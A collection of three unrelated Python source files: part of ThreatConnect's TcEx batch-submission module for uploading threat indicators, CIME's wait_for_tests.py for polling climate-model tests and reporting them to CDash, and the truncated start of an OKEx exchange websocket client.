+ OpenIOC
+ CybOX ™
+ Bro
+ Regex
+ SPL - Splunk ® Search Processing Language
Args:
name: The name for this Group.
file_name: The name for the attached signature for this Group.
file_type: The signature type for this Group.
file_text: The signature content for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Signature: An instance of the Signature class.
"""
group_obj = Signature(name, file_name, file_type, file_text, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def submit(
self,
poll: Optional[bool] = True,
errors: Optional[bool] = True,
process_files: Optional[bool] = True,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Submit Batch request to ThreatConnect API.
By default this method will submit the job request and data and if the size of the data
is below the value **synchronousBatchSaveLimit** set in System Setting it will process
the request synchronously and return the batch status. If the size of the batch is greater
than the value set the batch job will be queued.
Errors are not retrieve automatically and need to be enabled.
If any of the submit, poll, or error methods fail the entire submit will halt at the point
of failure. The behavior can be changed by setting halt_on_error to False.
Each of these methods can also be called on their own for greater control of the submit
process.
Args:
poll: If True poll batch for status.
errors: If True retrieve any batch errors (only if poll is True).
process_files: If true send any document or report attachments to the API.
halt_on_error: If True any exception will raise an error.
Returns.
dict: The Batch Status from the ThreatConnect API.
"""
# get file, group, and indicator data
content = self.data
# pop any file content to pass to submit_files
file_data = content.pop('file', {})
batch_data = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
batch_id = batch_data.get('id')
if batch_id is not None:
self.tcex.log.info(f'feature=batch, event=submit, batch-id={batch_id}')
# job hit queue
if poll:
# poll for status
batch_data = (
self.poll(batch_id=batch_id, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus')
)
if errors:
# retrieve errors
error_groups = batch_data.get('errorGroupCount', 0)
error_indicators = batch_data.get('errorIndicatorCount', 0)
if error_groups > 0 or error_indicators > 0:
batch_data['errors'] = self.errors(batch_id)
else:
# can't process files if status is unknown (polling must be enabled)
process_files = False
if process_files:
# submit file data after batch job is complete
self._file_threads.append(
self.submit_thread(
name='submit-files', target=self.submit_files, args=(file_data, halt_on_error,),
)
)
return batch_data
def submit_all(
self,
poll: Optional[bool] = True,
errors: Optional[bool] = True,
process_files: Optional[bool] = True,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Submit Batch request to ThreatConnect API.
By default this method will submit the job request and data and if the size of the data
is below the value **synchronousBatchSaveLimit** set in System Setting it will process
the request synchronously and return the batch status. If the size of the batch is greater
than the value set the batch job will be queued.
Errors are not retrieve automatically and need to be enabled.
If any of the submit, poll, or error methods fail the entire submit will halt at the point
of failure. The behavior can be changed by setting halt_on_error to False.
Each of these methods can also be called on their own for greater control of the submit
process.
Args:
poll: If True poll batch for status.
errors: If True retrieve any batch errors (only if poll is True).
process_files: If true send any document or report attachments to the API.
halt_on_error: If True any exception will raise an error.
Returns.
dict: The Batch Status from the ThreatConnect API.
"""
batch_data_array = []
file_data = {}
while True:
batch_data = {}
batch_id = None
# get file, group, and indicator data
content = self.data
# break loop when end of data is reached
if not content.get('group') and not content.get('indicator'):
break
if self.action.lower() == 'delete':
# no need to process files on a delete batch job
process_files = False
# while waiting of FR for delete support in createAndUpload submit delete request
# the old way (submit job + submit data), still using V2.
if len(content) > 0: # pylint: disable=len-as-condition
batch_id = self.submit_job(halt_on_error)
if batch_id is not None:
batch_data = self.submit_data(
batch_id=batch_id, content=content, halt_on_error=halt_on_error
)
else:
batch_data = {}
else:
# pop any file content to pass to submit_files
file_data = content.pop('file', {})
batch_data = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
batch_id = batch_data.get('id')
if batch_id is not None:
self.tcex.log.info(f'feature=batch, event=status, batch-id={batch_id}')
# job hit queue
if poll:
# poll for status
batch_data = (
self.poll(batch_id, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus')
)
if errors:
# retrieve errors
error_count = batch_data.get('errorCount', 0)
error_groups = batch_data.get('errorGroupCount', 0)
error_indicators = batch_data.get('errorIndicatorCount', 0)
if error_count > 0 or error_groups > 0 or error_indicators > 0:
batch_data['errors'] = self.errors(batch_id)
else:
# can't process files if status is unknown (polling must be enabled)
process_files = False
if process_files:
# submit file data after batch job is complete
self._file_threads.append(
self.submit_thread(
name='submit-files',
target=self.submit_files,
args=(file_data, halt_on_error,),
)
)
batch_data_array.append(batch_data)
# write errors for debugging
self.write_error_json(batch_data.get('errors'))
return batch_data_array
def submit_callback(
self,
callback: Callable[..., Any],
content: Optional[dict] = None,
halt_on_error: Optional[bool] = True,
) -> bool:
"""Submit batch data to ThreatConnect and poll in a separate thread.
The "normal" submit methods run in serial which will block when the batch poll is running.
Using this method the submit is done in serial, but the poll method is run in a thread,
which should allow the App to continue downloading and processing data while the batch
poll process is running. Only one batch submission is allowed at a time so that any
critical errors returned from batch can be handled before submitting a new batch job.
Args:
callback: The callback method that will handle
the batch status when polling is complete.
content: The dict of groups and indicator data (e.g., {"group": [], "indiciator": []}).
halt_on_error: If True the process should halt if any errors are encountered.
Raises:
RuntimeError: Raised on invalid callback method.
Returns:
bool: False when there is not data to process, else True
"""
# user provided content or grab content from local group/indicator lists
if content is not None:
# process content
pass
else:
content = self.data
file_data = content.pop('file', {})
# return False when end of data is reached
if not content.get('group') and not content.get('indicator'):
return False
# block here is there is already a batch submission being processed
if hasattr(self._submit_thread, 'is_alive'):
self.tcex.log.info(
'feature=batch, event=progress, status=blocked, '
f'is-alive={self._submit_thread.is_alive()}'
)
self._submit_thread.join()
self.tcex.log.debug(
'feature=batch, event=progress, status=released, '
f'is-alive={self._submit_thread.is_alive()}'
)
# submit the data and collect the response
batch_data: dict = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
self.tcex.log.trace(f'feature=batch, event=submit-callback, batch-data={batch_data}')
# launch batch polling in a thread
self._submit_thread = self.submit_thread(
name='submit-poll',
target=self.submit_callback_thread,
args=(batch_data, callback, file_data),
)
return True
def submit_callback_thread(
self,
batch_data: int,
callback: Callable[..., Any],
file_data: dict,
halt_on_error: Optional[bool] = True,
) -> None:
"""Submit data in a thread."""
batch_id = batch_data.get('id')
self.tcex.log.info(f'feature=batch, event=progress, batch-id={batch_id}')
if batch_id:
# when batch_id is None it indicates that batch submission was small enough to be
# processed inline (without being queued)
# poll for status
batch_status = (
self.poll(batch_id, halt_on_error=halt_on_error).get('data', {}).get('batchStatus')
)
# retrieve errors
error_count = batch_status.get('errorCount', 0)
error_groups = batch_status.get('errorGroupCount', 0)
error_indicators = batch_status.get('errorIndicatorCount', 0)
if error_count > 0 or error_groups > 0 or error_indicators > 0:
batch_status['errors'] = self.errors(batch_id)
else:
batch_status = batch_data
# launch file upload in a thread *after* batch status is returned. while only one batch
# submission thread is allowed, there is no limit on file upload threads. the upload
# status returned by file upload will be ignored when running in a thread.
if file_data:
self._file_threads.append(
self.submit_thread(
name='submit-files', target=self.submit_files, args=(file_data, halt_on_error,),
)
)
# send batch_status to callback
if callable(callback):
self.tcex.log.debug('feature=batch, event=calling-callback')
try:
callback(batch_status)
except Exception as e:
self.tcex.log.warning(f'feature=batch, event=callback-error, err="""{e}"""')
def submit_create_and_upload(self, content: dict, halt_on_error: Optional[bool] = True) -> dict:
"""Submit Batch request to ThreatConnect API.
Args:
content: The dict of groups and indicator data.
halt_on_error: If True the process should halt if any errors are encountered.
Returns.
dict: The Batch Status from the ThreatConnect API.
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
# special code for debugging App using batchV2.
self.write_batch_json(content)
# store the length of the batch data to use for poll interval calculations
self.tcex.log.info(
'''feature=batch, event=submit-create-and-upload, type=group, '''
f'''count={len(content.get('group')):,}'''
)
self.tcex.log.info(
'''feature=batch, event=submit-create-and-upload, type=indicator, '''
f'''count={len(content.get('indicator')):,}'''
)
try:
files = (('config', json.dumps(self.settings)), ('content', json.dumps(content)))
params = {'includeAdditional': 'true'}
r = self.tcex.session.post('/v2/batch/createAndUpload', files=files, params=params)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
return r.json()
except Exception as e:
self.tcex.handle_error(10505, [e], halt_on_error)
return {}
def submit_data(
self, batch_id: int, content: dict, halt_on_error: Optional[bool] = True
) -> dict:
"""Submit Batch request to ThreatConnect API.
Args:
batch_id: The batch id of the current job.
content: The dict of groups and indicator data.
halt_on_error (Optional[bool] = True): If True the process
should halt if any errors are encountered.
Returns:
dict: The response data
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
# store the length of the batch data to use for poll interval calculations
self._batch_data_count = len(content.get('group')) + len(content.get('indicator'))
self.tcex.log.info(
f'feature=batch, action=submit-data, batch-size={self._batch_data_count:,}'
)
headers = {'Content-Type': 'application/octet-stream'}
try:
r = self.tcex.session.post(f'/v2/batch/{batch_id}', headers=headers, json=content)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10525, [r.status_code, r.text], halt_on_error)
return r.json()
except Exception as e:
self.tcex.handle_error(10520, [e], halt_on_error)
return None
def submit_files(self, file_data: dict, halt_on_error: Optional[bool] = True) -> dict:
"""Submit Files for Documents and Reports to ThreatConnect API.
Critical Errors
* There is insufficient document storage allocated to this account.
Args:
halt_on_error: If True any exception will raise an error.
file_data: The file data to be submitted.
Returns:
dict: The upload status for each xid.
"""
# check global setting for override
if self.halt_on_file_error is not None:
halt_on_error = self.halt_on_file_error
upload_status = []
self.tcex.log.info(f'feature=batch, action=submit-files, count={len(file_data)}')
for xid, content_data in list(file_data.items()):
del file_data[xid] # win or loose remove the entry
status = True
# used for debug/testing to prevent upload of previously uploaded file
if self.debug and xid in self.saved_xids:
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
# process the file content
content = content_data.get('fileContent')
if callable(content):
try:
content_callable_name = getattr(content, '__name__', repr(content))
self.tcex.log.trace(
f'feature=batch-submit-files, method={content_callable_name}, xid={xid}'
)
content = content_data.get('fileContent')(xid)
except Exception as e:
self.tcex.log.warning(
f'feature=batch, event=file-download-exception, err="""{e}"""'
)
if content is None:
upload_status.append({'uploaded': False, 'xid': xid})
self.tcex.log.warning(f'feature=batch-submit-files, xid={xid}, event=content-null')
continue
api_branch = 'documents'
if content_data.get('type') == 'Report':
api_branch = 'reports'
if self.debug and content_data.get('fileName'):
# special code for debugging App using batchV2.
fqfn = os.path.join(
self.debug_path_files,
f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',
)
with open(fqfn, 'wb') as fh:
if not isinstance(content, bytes):
content = content.encode()
fh.write(content)
# Post File
url = f'/v2/groups/{api_branch}/{xid}/upload'
headers = {'Content-Type': 'application/octet-stream'}
params = {'owner': self._owner, 'updateIfExists': 'true'}
r = self.submit_file_content('POST', url, content, headers, params, halt_on_error)
if r.status_code == 401:
# use PUT method if file already exists
self.tcex.log.info('feature=batch, event=401-from-post, action=switch-to-put')
r = self.submit_file_content('PUT', url, content, headers, params, halt_on_error)
if not r.ok:
status = False
self.tcex.handle_error(585, [r.status_code, r.text], halt_on_error)
elif self.debug and self.enable_saved_file and xid not in self.saved_xids:
# save xid "if" successfully uploaded and not already saved
self.saved_xids = xid
self.tcex.log.info(
f'feature=batch, event=file-upload, status={r.status_code}, '
f'xid={xid}, remaining={len(file_data)}'
)
upload_status.append({'uploaded': status, 'xid': xid})
return upload_status
def submit_file_content(
self,
method: str,
url: str,
data: Union[bytes, str],
headers: dict,
params: dict,
halt_on_error: Optional[bool] = True,
) -> object:
"""Submit File Content for Documents and Reports to ThreatConnect API.
Args:
method: The HTTP method for the request (POST, PUT).
url: The URL for the request.
data: The body (data) for the request.
headers: The headers for the request.
params: The query string parameters for the request.
halt_on_error: If True any exception will raise an error.
Returns:
requests.models.Response: The response from the request.
"""
r = None
try:
r = self.tcex.session.request(method, url, data=data, headers=headers, params=params)
except Exception as e:
self.tcex.handle_error(580, [e], halt_on_error)
return r
def submit_job(self, halt_on_error: Optional[bool] = True) -> int:
"""Submit Batch request to ThreatConnect API.
Args:
halt_on_error: If True any exception will raise an error.
Returns:
int: The batch id from the API response.
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
try:
r = self.tcex.session.post('/v2/batch', json=self.settings)
except Exception as e:
self.tcex.handle_error(10505, [e], halt_on_error)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
data = r.json()
if data.get('status') != 'Success':
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
self.tcex.log.debug(f'feature=batch, event=submit-job, status={data}')
return data.get('data', {}).get('batchId')
def submit_thread(
self,
name: str,
target: Callable[[], bool],
args: Optional[tuple] = None,
kwargs: Optional[dict] = None,
) -> None:
"""Start a submit thread.
Args:
name: The name of the thread.
target: The method to call for the thread.
args: The args to pass to the target method.
kwargs: Additional args.
"""
self.tcex.log.info(f'feature=batch, event=submit-thread, name={name}')
args = args or ()
t = None
try:
t = threading.Thread(name=name, target=target, args=args, kwargs=kwargs, daemon=True)
t.start()
except Exception:
self.tcex.log.trace(traceback.format_exc())
return t
def threat(self, name: str, **kwargs) -> Threat:
"""Add Threat data to Batch object
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Threat: An instance of the Threat class.
"""
group_obj = Threat(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def user_agent(self, text: str, **kwargs) -> UserAgent:
"""Add User Agent data to Batch object
Args:
text: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
UserAgent: An instance of the UserAgent class.
"""
indicator_obj = UserAgent(text, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def url(self, text: str, **kwargs) -> URL:
"""Add URL Address data to Batch object.
Args:
text (str): The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
URL: An instance of the URL class.
"""
indicator_obj = URL(text, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def write_error_json(self, errors: list) -> None:
"""Write the errors to a JSON file for debuging purposes.
Args:
errors: A list of errors to write out.
"""
if self.debug:
if not errors:
errors = []
# get timestamp as a string without decimal place and consistent length
timestamp = str(int(time.time() * 10000000))
error_json_file = os.path.join(self.debug_path_batch, f'errors-{timestamp}.json.gz')
with gzip.open(error_json_file, mode='wt', encoding='utf-8') as fh:
json.dump(errors, fh)
def write_batch_json(self, content: dict) -> None:
"""Write batch json data to a file."""
if self.debug and content:
# get timestamp as a string without decimal place and consistent length
timestamp = str(int(time.time() * 10000000))
batch_json_file = os.path.join(self.debug_path_batch, f'batch-{timestamp}.json.gz')
with gzip.open(batch_json_file, mode='wt', encoding='utf-8') as fh:
json.dump(content, fh)
@property
def group_len(self) -> int:
"""Return the number of current groups."""
return len(self.groups) + len(self.groups_shelf)
@property
def indicator_len(self) -> int:
"""Return the number of current indicators."""
return len(self.indicators) + len(self.indicators_shelf)
def __len__(self) -> int:
"""Return the number of groups and indicators."""
return self.group_len + self.indicator_len
def __str__(self) -> str: # pragma: no cover
"""Return string represtentation of object."""
groups = []
for group_data in self.groups.values():
if isinstance(group_data, dict):
groups.append(group_data)
else:
groups.append(group_data.data)
for group_data in self.groups_shelf.values():
if isinstance(group_data, dict):
groups.append(group_data)
else:
groups.append(group_data.data)
indicators = []
for indicator_data in self.indicators.values():
if isinstance(indicator_data, dict):
indicators.append(indicator_data)
else:
indicators.append(indicator_data.data)
for indicator_data in self.indicators_shelf.values():
if isinstance(indicator_data, dict):
indicators.append(indicator_data)
else:
indicators.append(indicator_data.data)
data = {'group': groups, 'indicators': indicators}
return json.dumps(data, indent=4, sort_keys=True)
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy
from CIME.XML.machines import Machines
from CIME.test_status import *
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "ACME_Climate"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
testing_elem = xmlet.SubElement(site_elem, "Testing")
start_date_time_elem = xmlet.SubElement(testing_elem, "StartDateTime")
start_date_time_elem.text = time.ctime(current_time)
start_test_time_elem = xmlet.SubElement(testing_elem, "StartTestTime")
start_test_time_elem.text = str(int(current_time))
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
test_elem = xmlet.SubElement(test_list_elem, "Test")
test_elem.text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status == TEST_PASS_STATUS
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if (test_passed):
full_test_elem.attrib["Status"] = "passed"
elif (test_status == NAMELIST_FAIL_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
name_elem = xmlet.SubElement(full_test_elem, "Name")
name_elem.text = test_name
path_elem = xmlet.SubElement(full_test_elem, "Path")
path_elem.text = test_norm_path
full_name_elem = xmlet.SubElement(full_test_elem, "FullName")
full_name_elem.text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
value_elem = xmlet.SubElement(named_measurement_elem, "Value")
value_elem.text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
elapsed_time_elem = xmlet.SubElement(testing_elem, "ElapsedMinutes")
elapsed_time_elem.text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=True, # Important
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise SystemExit("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
|
okex_websocket.py
|
from exchange_sockets.exchange_websocket import ExchangeWebSocket
from singletones.custom_logger import MyLogger
import websocket
import threading
from time import sleep
from time import time
import json
import zlib
logger = MyLogger()
class OkexWebsocket(ExchangeWebSocket):
def __init__(self, stream_n_pairs):
super().__init__('Okex', stream_n_pairs)
self.possible_streams = ['depth', 'trade']
self.stream = {}
def init_streams(self):
streams_list = []
for pair, streams in self.pairs_n_streams.items():
for sub_stream in streams.split(','):
if self.has_stream(sub_stream):
streams_list.append("spot/{}:{}".format(sub_stream, pair))
self.stream['op'] = 'subscribe'
self.stream['args'] = streams_list
def start_multiple_websocket(self, init_streams=True):
super().start_multiple_websocket(init_streams=init_streams)
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp("wss://real.okex.com:8443/ws/v3",
on_open=self.__on_open,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = 15
while not self.ws.sock or not self.ws.sock.connected and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
logger.error("%s Couldn't connect to %s! Exiting.",
self.node,
self.exchange)
self.close_socket()
else:
logger.info('{} socket is started:\n{}\n{}'.format(self.exchange,
self.node,
self.stream))
def inflate(self, data):
decompress = zlib.decompressobj(
-zlib.MAX_WBITS # see above
)
inflated = decompress.decompress(data)
inflated += decompress.flush()
return inflated
def save_trade(self, message):
data_to_append = {}
stream = message['table'].split('/')[1]
for data in message['data']:
symbol = data['instrument_id']
time_stamp = data['timestamp']
append_msg = "{},{},{},{}\n".format(time_stamp,
data['price'],
data['size'],
data['side'][0])
if not data_to_append.get(symbol, None):
